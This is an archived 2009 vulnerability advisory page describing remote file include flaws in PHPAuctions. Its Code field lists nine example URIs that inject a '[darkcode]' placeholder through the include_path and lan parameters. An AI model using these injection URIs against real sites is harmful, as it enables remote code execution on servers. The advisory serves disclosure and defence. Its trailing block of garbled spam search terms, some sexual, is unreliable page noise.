exploits , vulnerabilities , articles , PHPAuctions Multiple Remote File Include Vulnerabilities

Title	PHPAuctions Multiple Remote File Include Vulnerabilities
Published	2009-01-06-12:00AM
Updated	2009-01-06-06:22PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	~darkmasking~
Vulnerable	PHPAuctions.info PHPAuctions 0
Not Vulnerable
Code	An attacker can exploit these issues via a browser.The following example URIs are available:http://www.example.com/[path]/includes/settings.inc.php?include_path=[darkcode] http://www.example.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode] http://www.example.com/[path]/includes/converter.inc.php?include_path=[darkcode] http://www.example.com/[path]/includes/messages.inc.php?include_path=[darkcode] http://www.example.com/[path]/includes/stats.inc.php?include_path=[darkcode] http://www.example.com/[path]/includes/useragent.inc.php?include_path=[darkcode] http://www.example.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode] http://www.example.com/[path]/browse.php?lan=[darkcode] http://www.example.com/[path]/search.php?lan=[darkcode]
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-15 Adobe Reader and Acrobat (CVE-2009-4324) Remote Code Execution Vulnerability
2009-12-14 Microsoft Protected Extensible Authentication Protocol Authentication Bypass Vulnerability
2009-12-14 Google Chrome DNS Pre-Fetching Proxy Cache Information Disclosure Vulnerability
2009-12-14 Oracle E-Business Suite Multiple Remote Vulnerabilities
2009-12-14 MySQL Multiple Remote Denial Of Service Vulnerabilities
2009-12-14 Digital Scribe Multiple SQL Injection Vulnerabilities
2009-12-14 Microsoft WordPad and Office Text Converters Word 97 File Parsing Memory Corruption Vulnerability
2009-12-14 Microsoft Protected Extensible Authentication Protocol Memory Corruption Vulnerability
2009-12-14 WebKit Web Inspector Cross Site Scripting Vulnerability
2009-12-11 Symantec Veritas VRTSweb Incoming Data Remote Code Execution Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 13:13:06 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
yangzhefen www.znhr.z sex xxxL v global ann mambo//ind xoop 2...tion=c xXxsex sixteensex //metaadmi php-nuke 2 www.securi SXE PHOTOS Free tamil Vulnerabil news for c Soon18 WWW.googly Wap.mobext WWW.FREE P Free hindi Free hindi components WWW.FRESEX www.austra 1.1 wheresjame www.bjhzjt www.yiyuan phpbb Exp 582005918. Www themls sexlmage XXXTV Bavanasexy FrontPage natalia cr www.maopw. 200 /compo canl www.51-sf. www.ltmcs. www.uno999 search/exp dmoz.im Www.Archiv www.thai s invision p eros ramaz ariel rebe